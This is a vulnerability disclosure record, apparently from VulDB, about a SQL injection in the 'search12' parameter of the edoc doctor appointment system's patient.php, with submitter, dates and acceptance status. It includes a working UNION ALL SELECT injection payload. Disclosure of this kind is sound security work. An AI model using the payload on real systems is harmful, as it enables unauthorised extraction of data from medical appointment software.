| Title | SQL injection exists for search12 parameter of edoc doctor appointment system |
|---|---|
| Description | There is a SQL injection vulnerability in the directory xxx. The specific parameter is "search12". Because there is no restriction or filtering of user input, a malicious user can attack by constructing illegal parameters, which leads to the attacker acquiring important system information. |
| Payload | `search12=Test Patient' UNION ALL SELECT CONCAT(0x71707a7a71,0x65704d614147646e5542796a494f4e4a62416b666e415a6e4b6e4a424d72707975554261756d5667,0x7170717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL---&search=Search` |
| Source | https://github.com/E1CHO/cve_hub/blob/main/edoc%20doctor%20appointment%20system/edoc%20docker%20search.pdf |
| User | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
| Submission | 02/27/2023 08:53 (3 years ago) |
| Moderation | 02/27/2023 12:07 (3 hours later) |
| Status | Accepted |
| VulDB entry | 221821 [SourceCodester Doctors Appointment System 1.0 /edoc/doctor/patient.php search12 sql injection] |
| Points | 20 |